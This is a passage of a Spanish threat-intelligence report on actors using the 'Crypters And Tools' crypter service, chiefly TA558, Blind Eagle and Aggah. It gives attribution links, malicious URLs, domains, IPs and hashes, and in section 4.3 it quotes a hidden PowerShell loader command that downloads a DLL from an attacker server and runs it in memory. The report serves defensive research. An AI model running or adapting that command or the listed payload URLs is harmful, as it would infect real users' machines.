Crypters And Tools. Parte 2: Diferentes patas — una sola maraña

En la primera parte de nuestro análisis presentamos el servicio Crypters And Tools, identificado durante la investigación de campañas maliciosas llevadas a cabo por distintos grupos. El informe se centró en la arquitectura interna de la herramienta y en su infraestructura asociada. En esta segunda parte, analizamos los actores que han empleado Crypters And Tools en sus campañas, las posibles relaciones entre ellos, sus características distintivas, así como a los usuarios del crypter, algunos de los cuales están vinculados directamente con los grupos analizados.

Autores: Aleksandr Badaev, Elena Furashova

blind-1.jpg

Hallazgos clave

  • Al menos seis grupos de amenazas conocidos han utilizado Crypters And Tools en sus campañas.
  • Algunas de estas agrupaciones muestran vínculos entre sí, los cuales se exponen en este artículo.
  • El grupo Aggah, que no había sido mencionado públicamente desde 2022, continúa realizando ataques a nivel global.
  • Se ha logrado identificar a varios usuarios del crypter.
  • Algunos de estos usuarios están afiliados directamente a los grupos Blind Eagle y TA558 y son sus miembros.

Presentación

En la primera parte de nuestro análisis presentamos el servicio Crypters And Tools, identificado durante la investigación de campañas maliciosas llevadas a cabo por distintos grupos. El informe se centró en la arquitectura interna de la herramienta y en su infraestructura asociada. En esta segunda parte, analizamos los actores que han empleado Crypters And Tools en sus campañas, las posibles relaciones entre ellos, sus características distintivas, así como a los usuarios del crypter, algunos de los cuales están vinculados directamente con los grupos analizados.

Además, nuestra investigación ha confirmado que el grupo Aggah continúa realizando ataques, a pesar de que algunos investigadores señalaron que había cesado su actividad en 2022.

Muchos investigadores se han encontrado con ataques que implicaban Crypters And Tools y han interpretado erróneamente algunas de sus características recurrentes (el uso de Ande Loader, la variable $codigo, la infraestructura de red del crypter) como exclusivas de actores de amenazas específicos. Consideramos que se trata de un error de atribución. Al final de este artículo, incluimos referencias a todos los informes disponibles públicamente que mencionan Crypters And Tools o sus versiones anteriores: los crypters Codigo.

1. Grupos de amenazas que utilizan Crypters And Tools en sus campañas

TA558Activo al menos desde 2018, este grupo inicialmente centró sus ataques en el sector turístico de América Latina, así como en Europa Occidental y los Estados Unidos, ampliando posteriormente su actividad a otras regiones. Emplea phishing, esteganografía y distintos tipos de malware, incluyendo Agent Tesla, FormBook y Loda RAT.
Blind Eagle (APT-C-36)Desde 2018, Blind Eagle ha estado atacando Sudamérica, especialmente Colombia, además de Ecuador y España. El grupo suele utilizar phishing y malware como njRAT, BitRAT y AsyncRAT, centrándose principalmente en entidades gubernamentales y corporativas.
Aggah (Hagga)Grupo activo al menos desde 2018. Conduce campañas de phishing a nivel global, con especial presencia en Asia, aunque también se ha observado actividad en Latinoamérica. Utiliza herramientas como el crypter 3LOSH, RevengeRAT y Agent Tesla. Algunos investigadores han señalado que los integrantes del grupo podrían tener origen pakistaní.
PhaseShiftersGrupo dirigido contra entidades gubernamentales en Rusia, Bielorrusia y Polonia. Emplea phishing, esteganografía y repositorios como GitHub y Bitbucket para distribuir malware, incluyendo herramientas como Rhadamanthys.
UAC-0050Activo al menos desde 2020, este grupo tiene como objetivo estructuras gubernamentales en Ucrania, Polonia y Rusia. Difunde documentos de phishing que simulan ser comunicaciones oficiales, y distribuye principalmente Remcos RAT, Quasar RAT y Remote Utilities.
PhantomControlDesde julio de 2023 ha utilizado sitios comprometidos para distribuir ScreenConnect, seguido por AsyncRAT. En una fase posterior, migró al uso de Ande Loader para la entrega de SwaetRAT. Existen indicios que apuntan a una posible relación con Blind Eagle.
Tabla 1. Grupos de amenazas que utilizan Crypters And Tools

Blind Eagle

TA558

Aggah

PhantomControl

PhaseShifters

UAC-0050

Geografía de los ataques

América Latina: Colombia, Ecuador, Chile, Panamá, Brasil

América Latina, América del Norte, Europa Occidental

América Latina, América del Norte, Europa Occidental, Oriente Medio, Asia Oriental

N/A

Rusia, Bielorrusia, Polonia

Rusia, Bielorrusia, Polonia, Ucrania, Moldavia y los Estados Bálticos

Malware

Remcos RAT, Async RAT, njRAT, Quasar RAT, BitRAT, LimeRAT

Remcos RAT, Async RAT, XWorm, Lokibot, FormBook, Agent Tesla, RevengeRAT, njRAT, LimeRAT

Rhadamanthys, XWorm, Agent Tesla, Remcos RAT, Warzone RAT, Nanocore RAT, njRAT, AzoRult, Lokibot, RevengeRAT,Async RAT, njRAT, LimeRAT

Async RAT, SwaetRAT, ScreenConnect

Rhadamanthys, DarkTrack RAT, Meta Stealer

Remcos RAT, Meduza Stealer, Lumma Stealer, Quasar RAT

Idioma de los correos y documentos

Español, portugués

Español, inglés; pueden emplear idiomas de las regiones atacadas

Inglés, español; pueden emplear idiomas de las regiones atacadas

N/A

Ruso

Ucraniano, Ruso, Rumano, Inglés

Uso de Crypters And Tools

2023–2025

2023–2025

2021–2023

2023

2024

2024

Tabla 2. Resumen de los grupos de amenazas que utilizan Crypters And Tools

En el presente artículo nos centramos en tres grupos de hackers principales — TA558, Blind Eagle y Aggah — así como en ciertos usuarios de Crypters And Tools que podrían estar vinculados a ellos. Para mayor claridad, la siguiente tabla ilustra algunas de las relaciones observadas entre estos actores.

 AggahBlind Eagle
TA558
  • Uso recurrente de la cadena "cdt" a lo largo de múltiples campañas
  • Ataques dirigidos a hoteles en 2018
  • Similitudes en el uso de malware y crypters (3LOSH, Crypters And Tools)
  • Código de scripts similar en campañas observadas en 2024
  • Uso de infraestructura compartida de Crypters And Tools (servidorwindows.ddns.com.br)
  • Zona geográfica principal de los ataques: América Latina
  • Uso del español como idioma principal en los correos de phishing
  • Herramientas similares utilizadas (AsyncRAT, Remcos RAT, entre otras)
AggahN/A
  • Uso de infraestructura compartida de Crypters And Tools (149.56.200.165)
  • Algunos investigadores han sugerido que Aggah podría ser una subagrupación de Blind Eagle
Tabla 3. Intersecciones entre los grupos

Los tres grupos siguen activos y continúan llevando a cabo numerosas campañas. En la actualidad, Aggah parece haber dejado de utilizar Crypters And Tools, o bien sus campañas más recientes han quedado fuera de nuestro alcance de visibilidad. No obstante, el grupo permanece activo, como se detallará en la sección correspondiente de este artículo.

Mientras tanto, TA558 y Blind Eagle siguen empleando activamente el crypter.

Por ejemplo, en un report publicado en marzo por Check Point Research, se describieron ataques atribuidos a Blind Eagle. Observamos la campaña mencionada ya en febrero, en particular un IP 62.60.226[.]64 que también fue señalado por Check Point como un indicador de compromiso. En ese servidor se alojaban múltiples archivos asociados con Crypters And Tools, aunque en esa campaña específica es posible que el crypter no se empleara directamente.

Más adelante, en la sección dedicada a los usuarios de Crypters And Tools, hablaremos también de campañas asociadas a Blind Eagle, llevadas a cabo por actores que operan bajo los alias deadpoolstart2025 y ABBAS, y que muestran una clara vinculación con el grupo.

En el caso de TA558, un ejemplo representativo del uso de Crypters And Tools puede encontrarse en una campaña de phishing observada en marzo, en la que se utilizó el siguiente archivo:

  • Purchase Inquiry.xla (SHA-256: 55ea07bbd700488fd6330d289f210b2da119401a9e27009472d1afec2f6c6339)
    La campaña incluía varios URL característicos de TA558:
  • http://104.168.7.38/xampp/knct/nicefeelingwithbestgoodthinksfor.txt
  • http://104.168.7.38/xampp/knct/Lightgreatloversonhereforlovingpeoplesalot.hta
  • http://104.168.7.38/xampp/knct/Lightgreatloversonhereforlovingpeoplesalot.png

Los usuarios Brainiac, syscore y negrocock, vinculados a TA558, también serán mencionados en la sección correspondiente del informe/artículo.

Cabe destacar que tanto TA558 como Blind Eagle no se limitan al uso exclusivo de Crypters And Tools en sus campañas. Por ejemplo, en abril de 2025, detectamos un correo malicioso representativo de TA558.

Figure 1. Example of letter TA558
Figura 1. Ejemplo de correo malicioso enviado por TA558

El correo electrónico contenía dos documentos maliciosos que descargaban una carga maliciosa de un servidor con un patrón típico de TA558:

  • http://216.9.224.185/33/eco/goodthingsforbestfeaturesgivenmegoodthingsforbest_______________goodthingsforbestfeaturesgivenme_____________goodthingsforbestfeaturesgivenme.doc

A continuación, se descargó y ejecutó goodthingsforbestfeaturesgivenme.vbe, lo que provocó que la víctima se infectara con el malware Remcos RAT. Cabe señalar que Crypters And Tools no fue utilizado en esta ataque.

2. PhaseShifters, UAC-0050 y PhantomControl

En la primera parte de nuestro artículo, ya mencionamos que llegamos a identificar Crypters And Tools mientras investigábamos las actividades de los grupos PhaseShifters y UAC-0050. Las coincidencias entre ambos actores se analizan en detalle en una de nuestras publicaciones anteriores. Ambos grupos utilizaron Crypters And Tools en sus campañas; no obstante, no se ha observado ninguna relación directa entre ellos y los desarrolladores del crypter.

En cuanto a PhantomControl, solo existen dos informes públicos, ambos publicados por eSentire. El primero no hace mención a Crypters And Tools, pero el segundo indica que el grupo comenzó a emplear Ande Loader. En dicho análisis, esta herramienta fue atribuida a Blind Eagle; sin embargo, dado que Ande Loader forma parte de Crypters And Tools, esta atribución resulta inexacta. Además, los enlaces a paste.ee y las imágenes referenciadas en el informe están directamente relacionados con el crypter, lo que permite afirmar con certeza que PhantomControl utilizó Crypters And Tools en sus campañas.

3. Características de TA558 y sus diferencias con Blind Eagle

En diversos artículos en los que los investigadores se han encontrado con Crypters And Tools, se han producido errores de atribución entre grupos de hackers debido a la falta de información previa que indicara que este crypter constituye una herramienta independiente, y no un desarrollo exclusivo de un actor concreto. Un ejemplo de ello es un informe publicado en 2023 por investigadores de Qi An Xin, donde se plantea la hipótesis de que el grupo Aggah podría ser una subagrupación de Blind Eagle, basándose en similitudes significativas en sus TTP, cierto solapamiento en el malware utilizado y en el hecho de que ambos grupos tienen como objetivo regiones geográficamente cercanas. Aunque no descartamos por completo esta posibilidad, ya en un artículo anterior demostramos que muchos de estos solapamientos pueden explicarse por el uso compartido de Crypters And Tools. No obstante, un análisis detallado de las etapas finales de las campañas revela diferencias claras entre TA558 y Blind Eagle.

En esta sección destacaremos algunos de los rasgos característicos de ambos grupos que permiten diferenciarlos con mayor precisión. Estos elementos servirán de base para establecer conexiones entre dichos actores y varios usuarios del crypter, que se abordarán en las secciones posteriores

3.1.  URLs y nombres de archivo característicos de TA558

Las campañas atribuidas a TA558 suelen incluir patrones de URL que no se asocian directamente con la infraestructura de Crypters And Tools. Algunos ejemplos:

  • 103.67.162.213/xampp/gd/kissingagirlissoeasyrecentlyireallyfeelsheismygirlineverwanttohurtherweneverwantotkissher_______ilovehertrulyfromtheheartiloveyou..doc
  • 172.232.175.155/88122/bh/bh.h.h.h.hhhhh.doC
  • 172.234.239.22/990099/gf/l.c.c.c.ccx.doC

Además, las campañas de TA558 suelen presentar nombres de archivo malicioso con patrones recurrentes. Ejemplos típicos:

  • PO-24052800.xls
  • factura 00005111, 005114, 005115.pdf.xlam
  • Orden de compra 4000171682.docx

Aunque estos nombres son relativamente distintivos, cabe destacar que se han observado patrones similares en campañas llevadas a cabo por el actor conocido como bukky101, del cual se hablará más adelante en este artículo.

3.2.  Dominios característicos de TA558

Los grupos TA558, Blind Eagle y Aggah hacen uso de diferentes servicios de DNS dinámico, como duckdns.org, 3utilities o us.archive.org. En la mayoría de los casos, los dominios registrados en estas plataformas están vinculados con la infraestructura de Crypters And Tools. Por ejemplo, una de las URL que inicialmente habíamos atribuido a la infraestructura de TA558 fue posteriormente encontrada embebida en una muestra del propio crypter:

  • http://servidorwindows.ddns.com.br/Files/js.jpeg
Figure 2. URL previously attributed to TA558 found embedded in the crypter itself
Figura 2. URL atribuida inicialmente a TA558, identificada posteriormente en una muestra de Crypters And Tools

Al mismo tiempo, hemos observado dominios empleados en ataques que guardan gran similitud con los asociados a TA558, y que contienen archivos con nombres largos característicos, aunque no aparecen en la configuración interna del Crypters And Tools. A continuación se presentan algunos ejemplos de estos dominios, que comparten un patrón común basado en la repetición de letras en los nombres de los días de la semana:

  • mondayyyyvbsgreeceee.duckdns.org
  • wednesdayyyyyyfile.duckdns.org
  • thursdayyyyyyfileeee.duckdns.org
  • fridayyyyvert.3utilities.com

3.3. Diferencias de infraestructura entre TA558 y Blind Eagle

El grupo Blind Eagle utiliza predominantemente ASNs colombianos, mientras que no se ha observado este comportamiento en las campañas atribuidas a TA558. La siguiente tabla recoge algunos de los sistemas autónomos (ASN) utilizados habitualmente por cada grupo, junto con ejemplos de direcciones IP vinculadas a TA558 y Blind Eagle dentro de dichos rangos.

GrupoPrincipales ASN utilizados por los gruposEjemplos de direcciones IP
Blind EagleColombia Movil179.15.149.222
191.88.255.30
181.134.151.81
181.131.216.73
181.52.105.166
Telmex Colombia
Tigo — UNE
TA558AS-COLOCROSSING192.210.150.33
107.172.148.248
104.168.7.36
149.28.237.172
172.234.217.133
Akamai Connected Cloud
AS-VULTR
Tabla 4. Infraestructura de los actores de amenazas

4. Aggah. Nuevas campañas y conexión con TA558

Aggah (también conocido como Hagga) es un grupo de amenazas que lleva a cabo campañas de phishing a escala global. Su arsenal de malware incluye RevengeRAT, Agent Tesla, Nanocore RAT, Warzone RAT, njRAT, AzoRult, entre otros. Uno de los elementos más característicos de sus cadenas de ataque es el uso frecuente de infraestructura sin servidor (serverless) para alojar cargas maliciosas, recurriendo a plataformas como Blogspot, Pastebin o archive.org. En 2018, un artículo publicado en FreeBuf reveló la posible identidad de los responsables del grupo y los relacionó con actores de origen paquistaní.

A continuación, se analizan varios vínculos entre TA558 y Aggah, basados en inteligencia de fuentes abiertas y campañas observadas previamente. Sin embargo, sería necesario un análisis más profundo para confirmar que se trata de un mismo grupo. En este momento, resulta razonable suponer que Aggah mantiene vínculos con TA558, posiblemente a través del intercambio de herramientas, malware y estrategias de ataque.

Para ilustrar esta conexión, comenzamos revisando las primeras campañas conocidas de Aggah, documentadas antes de que el grupo recibiera su nombre.

4.1. Primeras menciones a Aggah

Los primeros indicios de actividad vinculada a este actor de amenazas se remontan a 2018, en el contexto de las campañas de malware Roma225 y Operation Commando. La atribución de estas campañas al grupo Aggah se detalla en las secciones siguientes.

4.1.1. Ataques en 2018

La campaña maliciosa Roma225 fue analizada y publicada en diciembre de 2018 por investigadores de la empresa Yoroi. En su informe se describía la distribución de RevengeRAT a través de documentos de PowerPoint, con las cargas maliciosas alojadas en la plataforma Blogspot. De ese análisis conviene destacar dos elementos clave. Los metadatos del documento distribuido indicaban como autor a C.D.T Original. Se observó el uso de la cadena "CDT" en nombres de variables dentro del código.

Figure 3. Metadata of the malicious document
Figura 3. Metadatos del documento malicioso
Figure 4. Malicious script containing
Figura 4. Script malicioso con cadenas "CDT" (fuente: informe de Yoroi)

En ese momento, el grupo aún no había recibido el nombre de Aggah. Sin embargo, es relevante señalar que TA558 fue mencionado por primera vez en un informe publicado por Proofpoint ese mismo año (2018). Curiosamente, esa investigación hacía referencia a los mismos metadatos y a los mismos indicadores de compromiso en la red que los observados en la campaña Roma225: el autor del documento era C.D.T Original y el dominio utilizado era cdtmaster[.]com. No obstante, el informe de Proofpoint no establecía una conexión directa entre Roma225 y TA558.

Figure 5. Mention of document metadata in Proofpoint’s publication
Figura 5. Mención a los metadatos del documento en el artículo de Proofpoint
Figure 6. Mention of malicious domain in Proofpoint’s publication
Figura 6. Mención al dominio malicioso en el artículo de Proofpoint

4.1.2. Ataques en 2019

En marzo de 2019, la unidad Unit 42 de Palo Alto Networks publicó un artículo sobre una campaña denominada Operation Commando, dirigida contra cadenas hoteleras. La campaña presentaba múltiples similitudes con Roma225, que se resumen en la tabla comparativa que se muestra a continuación. Teniendo en cuenta estos puntos en común, resulta razonable concluir que ambas campañas fueron llevadas a cabo por el mismo actor, que en ese momento aún no había recibido el nombre de Aggah.

Unit 42 — Operation Comando

Yoroi — Roma225

Dropurls

minhacasaminhavidacdt.blogspot[.]comminhacasaminhavidacdt.blogspot[.]com
internetexplorer200[.]blogspot[.]compocasideiascdt.blogspot[.]com
 cdtmaster[.]com.br

C2

systenfailued.ddns[.]com[.]brsysten32.ddns[.]net
office365update[.]duckdns[.]orgoffice365update[.]duckdns.org
cdtoriginal[.]ddns[.]net 
Tabla 6. Comparativa de dominios utilizados en ambas campañas

Durante 2019, los ataques a hoteles continuaron, incluyendo campañas atribuidas a TA558. Sin embargo, hasta ese momento, no se habían detectado coincidencias claras entre las actividades de TA558 y las de Aggah en dichas campañas.

4.1.3. Hagga == Aggah. El origen del nombre

En abril de 2019, Unit 42 publicó un artículo titulado "Aggah Campaign", en el que se describían ataques que empleaban RevengeRAT junto con el uso malicioso de servicios legítimos como Pastebin, Blogspot y Bit.ly. La campaña fue bautizada como "Aggah" debido a la aparición de la cadena "hagga" en la configuración del malware, la cual también era utilizada como nombre de usuario en Pastebin. Más allá del nombre, el informe identificaba varias coincidencias con campañas anteriores, lo que permitió establecer una línea de continuidad en la actividad del grupo:

  • Nombre de mutex con un error tipográfico en "System32″ — RV_MUTEX-WindowsUpdateSysten32,
  • Uso de palabras clave como oldman, steve, hagga y roma225 en la configuración de RevengeRAT
  • Indicadores de red coincidentes con ataques anteriores: office365update.duckdns[.]org, systen32.ddns[.]net.
Figure 7. RevengeRAT configuration containing the key hagga (source: Unit 42 report)
Figura 7. Configuración de RevengeRAT con la clave hagga (fuente: artículo de Unit 42)

Estos hallazgos permitieron confirmar que el grupo Aggah estaba detrás de las campañas Roma225 y Operation Commando.

Uno de los elementos más destacados del informe fue la presencia del identificador HOTEIS NOVOS ("hoteles nuevos", en portugués) dentro de la configuración del malware. Este detalle resulta particularmente significativo, ya que TA558 también llevaba a cabo en esa época campañas de phishing dirigidas al sector hotelero, con contenidos y documentos redactados en portugués.

Figure 8. RevengeRAT configuration with Portuguese identifier (source: Unit 42 report)
Figura 8. Configuración de RevengeRAT con identificador en portugués (fuente: artículo de Unit 42)

4.1.4. Ataques en 2020–2022

Entre 2019 y 2021, el grupo Aggah distribuyó el malware AzoRult mediante su propio panel de comando y control, conocido como ManaTools. El término "mana" aparece de forma recurrente en relación con este actor, tanto en los metadatos de documentos como en nombres de dominio. En una de las secciones siguientes, se analizará una posible conexión entre Aggah y Crypters And Tools, y esta convención de nomenclatura constituye uno de los elementos de apoyo para dicha hipótesis.

Figure 9. ManaTools command-and-control panel.png
Figura 9. Panel de control ManaTools

Ejemplos de dominios utilizados por el grupo Aggah en 2019:

  • mastermana1.serveirc[.]com
  • mastermana2.serveirc[.]com
  • mastermana3.serveirc[.]com
  • mastermana4.serveirc[.]com
  • mastermana5.serveirc[.]com
Figure 10. Document metadata from Aggah’s malicious files.png
Figura 10. Metadatos de documentos maliciosos utilizados en campañas de Aggah

Durante el periodo 2020–2022, se identificaron varias conexiones relevantes entre TA558 y Aggah:

  • Similitud en la geografía de los ataques: principalmente América Latina y Europa Occidental.
  • Conjunto de herramientas maliciosas similares: ambos grupos han utilizado Remcos RAT, RevengeRAT y AzoRult.
  • En 2021, la dirección IP 3.218.4.249 fue utilizada por ambos grupos para alojar cargas maliciosas.
  • Uso compartido del prefijo "cdt" en nombres de dominio:
    • warzonecdt[.]duckdns[.]org (ТА558, fuente: Proofpoint),
    • ccnewcdt[.]duckdns[.]org (Aggah, dominio resuelto en 192.154.226[.]47, fuente: Team Cymru).
  • Coincidencias en metadatos y similitudes en los macros de los documentos maliciosos
Figure 11. Macro code comparison: Aggah (left) vs TA558 (right)
Figura 11. Comparación de código macro: Aggah (izquierda) vs TA558 (derecha)
Figure 12. Embedded OLE object authors: Aggah (left) vs TA558 (right)
Figura 12. Autores de objetos OLE incrustados: Aggah (izquierda) vs TA558 (derecha)

4.2. Ataques en 2023–2025

Aunque los artículos públicos sugerían que Aggah cesó su actividad en 2022, hemos identificado varios indicadores que apuntan a que el grupo sigue activo.

Durante la búsqueda de señales de actividad reciente, localizamos archivos cuyo estilo de codificación y ciertos elementos característicos recordaban claramente a campañas anteriores de Aggah. Investigaciones posteriores relacionaron estos elementos con una operación de phishing denominada MEME#4CHAN, descrita en un informe publicado por Securonix en 2023. Si bien dicha publicación no atribuía la campaña a ningún grupo en particular, las similitudes encontradas apuntan con fuerza a Aggah como probable autor.

Varios indicadores clave coinciden con los patrones históricos de Aggah:

  • Temáticas de los correos centradas en el sector hotelero y turístico. Aunque estos temas son comunes en campañas de phishing, Aggah los ha utilizado repetidamente. Además, los nombres de los documentos aparecían tanto en inglés como en portugués, al igual que en las campañas de 2019.
  • Uso de infraestructura sin servidor (serverless): plataformas como Blogspot, MediaFire, usrfiles.
  • Estilo de codificación: muchos de los scripts parecían escritos manualmente, con nombres de variables poco convencionales e incluso humorísticos, y el uso de palabras en urdu, lo que coincide con hipótesis anteriores sobre un posible origen pakistaní del grupo.

Un ejemplo especialmente llamativo fue un script de PowerShell que contenía la variable $ALLSAVEBACKUP, que apuntaba a la página de Blogspot backuphotelall.blogspot[.]com, junto con una cadena de comentario peculiar que también apareció en campañas posteriores de Aggah.

Figure 13. Excerpt from a PowerShell script
Figura 13. Fragmento de script PowerShell (fuente: artículo de Securonix)
Figure 14. Repeated comment (source: Securonix report)
Figura 14. Comentario repetido en múltiples campañas (fuente: artículo de Securonix)

La página de Blogspot se utilizaba para alojar archivos maliciosos que también fueron encontrados en otros dominios de Blogspot y en repositorios de Bitbucket. Uno de esos archivos, all.txt, era accesible desde las siguientes direcciones:

https://bitbucket[.]org/!api/2.0/snippets/nikkerkhan/5qkMXX/c193c8cd66ad1405f4a0ebc7293d71d0f287eb98/files/all.txt
https://backuphotelall.blogspot[.]com/atom.xml
https://otherbusinesssep23.blogspot[.]com/atom.xml
https://backupalllogsmay23.blogspot[.]com/atom.xml
https://hotelbackuppowaug.blogspot[.]com/atom.xml
https://otherbizzunus.blogspot[.]com/atom.xml

Estos enlaces están asociados a campañas posteriores a MEME#4CHAN. Por ejemplo, el dominio hotelbackuppowaug.blogspot[.]com fue utilizado para alojar un archivo denominado lnvoice 1882936796.js, cuyo código incluía comentarios similares a los utilizados en scripts anteriores de Aggah. Un análisis detallado de esta muestra está disponible en AnyRun.

Figure 15. Aggah attack involving Agent Tesla
Figura 15. Ataque atribuido a Aggah con uso de Agent Tesla
Figure 16.1. PowerShell sample from attack (September 2023)
Figura 16.1. Fragmento de script PowerShell (septiembre de 2023)
Figure 16.2. PowerShell sample from attack (February 2023)
Figura 16.2. Fragmento de script PowerShell (febrero de 2023)

El análisis de estas campañas condujo a otra iniciada a finales de 2023, en la que Aggah comenzó a distribuir malware con temáticas relacionadas con impuestos y facturas, utilizando principalmente XWorm o Agent Tesla. El uso de Blogspot y Bitbucket continuó, y la estructura de los scripts apenas cambió respecto a campañas anteriores.

Un ejemplo de esta campaña: Robert_Michael_Tax_2023.js, un archivo JavaScript ofuscado que contactaba con el repositorio de Bitbucket kimkardaikehsi para descargar Agent Tesla. El código del script mantenía una estructura muy similar a las versiones previas.

Figure 17. PowerShell code fragment from attack (June 2024)
Figura 17. Fragmento de código PowerShell (junio de 2024)

Además, los indicadores de red mostraban el uso de términos como "cpa" y "mana":

manablack.duckdns[.]org
cpamay2024.duckdns[.]org
cpanewminemay24.duckdns[.]org

En 2025, las campañas de Aggah continúan activas, aunque las cargas maliciosas principales ahora son Rhadamanthys y XWorm. Una cadena de infección típica comienza con un archivo JavaScript ofuscado (a menudo con nombres relacionados con impuestos o formularios oficiales), que finalmente conduce a la ejecución de código PowerShell (Figura 18):

Figure 18. PowerShell code executed upon opening the JavaScript file
Figura 18. Código PowerShell ejecutado al abrir el archivo JavaScript

Al acceder a la página de Blogspot, se produce una redirección automática a un repositorio de Bitbucket, desde donde se descarga el script final de PowerShell, encargado de instalar el malware en el dispositivo de la víctima. Cabe señalar que, en algunos casos, se realiza una comprobación adicional de geolocalización antes de la descarga de la carga maliciosa, lo que permite a los atacantes seleccionar versiones del malware adaptadas a la región objetivo. Se pueden encontrar ejemplos de infecciones con XWormRhadamanthys en informes disponibles en AnyRun.

Figure 19. Geolocation check prior to malware delivery
Figura 19. Verificación de geolocalización antes de la entrega de la carga maliciosa

4.2.1. Más coincidencias entre Aggah y TA558

En 2024, el investigador IdaNotPro publicó un análisis de un archivo de phishing atribuido a TA558, en una entrada de blog titulada "TA558 Targeting Brazil". La campaña presentaba elementos conocidos: cebos de phishing relacionados con el sector hotelero y dominios de C2 que incluían la cadena "cdt", un patrón habitual en la infraestructura tanto de TA558 como de Aggah.

Al comparar el archivo analizado con muestras documentadas previamente de Aggah, identificamos varios solapamientos notables:

  • En una de las fases del script de PowerShell, se descargaba contenido desde el dominio detail-booking.com[.]br, un comportamiento similar al observado en cadenas de ataque atribuidas a Aggah. Por ejemplo, TA558 utilizaba una función llamada kimkarden, mientras que en las muestras de Aggah se hacía referencia al usuario de Bitbucket kimkardaikeshi. Las estructuras del código también presentaban similitudes.
Figure 20. On the left is the Aggah code (MD5: 11117203c6f2c96f6b78fd19bc27e49c), on the rights is the TA558 code (MD5: c90688783f910b2b4165e2263012e19b)
Figura 20. A la izquierda, código de Aggah (MD5: 11117203c6f2c96f6b78fd19bc27e49c), a la derecha, código de TA558 (MD5: c90688783f910b2b4165e2263012e19b)
  • Varios archivos vinculados al dominio detail-booking.com[.]br (utilizado por TA558) seguían patrones de nomenclatura coincidentes con los utilizados en campañas anteriores de Aggah.
Figure 21. Files associated with detail-booking.com[.]br
Figura 21. Archivos asociados al dominio detail-booking.com[.]br
  • Uno de los archivos de TA558 que se comunicaba con el dominio de C2 final cdt2023.ddns.net contenía en su configuración la cadena "CPA", un indicador recurrente observado en operaciones previas de Aggah.
Figure 22. Configuration of one of the files
Figura 22. Configuración del archivo (tria.ge)

Pese a las similitudes en infraestructura y técnicas utilizadas, comparar las campañas de Aggah y TA558 no permite afirmar con certeza que se trate del mismo grupo. Sin embargo, este análisis pone de manifiesto que existe un posible intercambio de herramientas, ideas y recursos entre ambos actores.

4.3. Uso de Crypters And Tools por parte del grupo Aggah

En la sección dedicada a la actividad de Aggah entre 2020 y 2022, ya mencionamos el uso de un panel de control conocido como ManaTools. En 2021, el grupo comenzó a utilizar el crypter 3LOSH, así como FsocietyAndTools, una de las primeras versiones de lo que más adelante evolucionaría como Crypters And Tools. Durante el análisis de campañas realizadas entre 2021 y 2022, identificamos varios artefactos que apuntan a un posible vínculo entre Aggah y la familia de crypters Codigo. Por ejemplo, la dirección IP 198.50.177[.]251 fue utilizada para alojar múltiples recursos, entre ellos un directorio llamado mastermana, que contenía cargas maliciosas relacionadas con campañas de Aggah. También alojaba una cuenta vinculada al desarrollador del crypter, identificado como nodetecton, la cual aparecía en la cadena de ejecución del crypter.

-windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://nodetecton@198.50.177.251/dll/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.85618406295/anamretsam/152.771.05.891//:ptth'))"

Además, como se indicó anteriormente, entre 2019 y 2021, investigadores observaron el uso recurrente del panel ManaTools, desarrollado por Aggah, en varias de sus campañas. En uno de los ataques detectados en 2022, se identificó el uso de XWorm como carga maliciosa. En este caso, el canal C2 era un bot de Telegram, con el que se comunicaba la cuenta @mastermana.

Figure 23. Telegram account @mastermana
Figura 23. Cuenta de Telegram: @mastermana

La búsqueda de referencias a este alias en Telegram condujo a un canal de YouTube denominado "Tiny Technology", que contiene vídeos de demostración de distintos exploits. La mayoría de estos vídeos muestra de forma destacada el logotipo de ManaTools, pero también se identificaron otros elementos relevantes:

  • Nombres de usuario en los entornos y máquinas virtuales (Master MANA, 007, entre otros).
  • Uso del repositorio Bitbucket hogya, que ya había sido vinculado previamente a campañas de Aggah (Figura 24).
  • Interfaz del crypter Crypters And Tools con los logotipos de ambas herramientas, lo que sugiere una posible colaboración o integración (Figura 25).
  • Presencia activa de Crypters And Tools en el sistema del atacante durante 2023 (Figura 26).
Figure 24. File creation in the hogya repository (screenshot from video)
Figura 24. Creación de archivos en el repositorio hogya (captura de vídeo)
Figure 25. Combined use of Crypters And Tools and ManaTools (screenshot from video)
Figura 24. Creación de archivos en el repositorio hogya (captura de vídeo)
Figure 26. Crypters And Tools seen in use by Aggah in 2023 (screenshot from video)
Figura 26. Uso de Crypters And Tools por parte de Aggah en 2023 (captura de vídeo)

5. Usuarios de Crypters And Tools y sus vínculos con grupos de amenazas

Como se indicó en la primera parte del informe, el número máximo de usuarios activos del crypter que identificamos fue de 42 (al 26 de noviembre de 2024). Cabe destacar que esta lista incluía administradores del servicio, usuarios con distintos alias pero con el mismo HardwareID, así como cuentas de prueba. Por lo tanto, la cantidad real de suscriptores activos del crypter era inferior.
Entre ellos, identificamos varios usuarios de particular interés.

5.1. bukky101

El siguiente usuario en la base de datos llamó nuestra atención.

Figure 27. Information from the database about the user bukky101
Figura 27. Información de la base de datos sobre el usuario bukky101

Este actor fue mencionado por los especialistas de eSentire en un artículo dedicado a campañas de phishing que utilizaban Ande Loader, lo que finalmente conducía a la infección con el stealer 0bj3ctivity. Según el informe, los datos robados eran enviados a un bot de Telegram operado por un usuario identificado como bukky101. De acuerdo con nuestro análisis, está claro que en esa campaña se empleó Crypters And Tools.

Llevamos a cabo una investigación más profunda sobre este actor y sus operaciones. Por ejemplo, en mayo de 2024, bukky101 distribuyó un ejemplar de Agent Tesla (SHA-256: 5a8794fa12ff401f9f7212e497d5d877010f493e3bb028abd54cb12f60fc550f). Los datos eran exfiltrados a través de un servidor SMTP controlado por el atacante en boydjackson[.]org. Cabe destacar que el malware utilizaba la contraseña Bukky101@, estableciendo un vínculo directo entre la muestra y el alias. Esta campaña fue descrita en detalle en el artículo mencionado.

Durante nuestro análisis, identificamos víctimas en un amplio abanico de países: Armenia, Grecia, India, Irak, Italia, Chipre, Colombia, Malasia, Emiratos Árabes Unidos, Pakistán, Arabia Saudita, Singapur y Turquía. Las víctimas pertenecían a sectores muy diversos, y no se identificó un patrón claro en la selección de objetivos por parte de bukky101.

En uno de los incidentes, el atacante ejecutó accidentalmente el malware en su propio equipo, lo que nos permitió acceder a una amplia telemetría, incluyendo:

  • contenido del portapapeles,
  • lista de aplicaciones instaladas,
  • información del sistema, como IP, antivirus, emuladores y detección de sandbox,
  • claves de licencia de Windows,
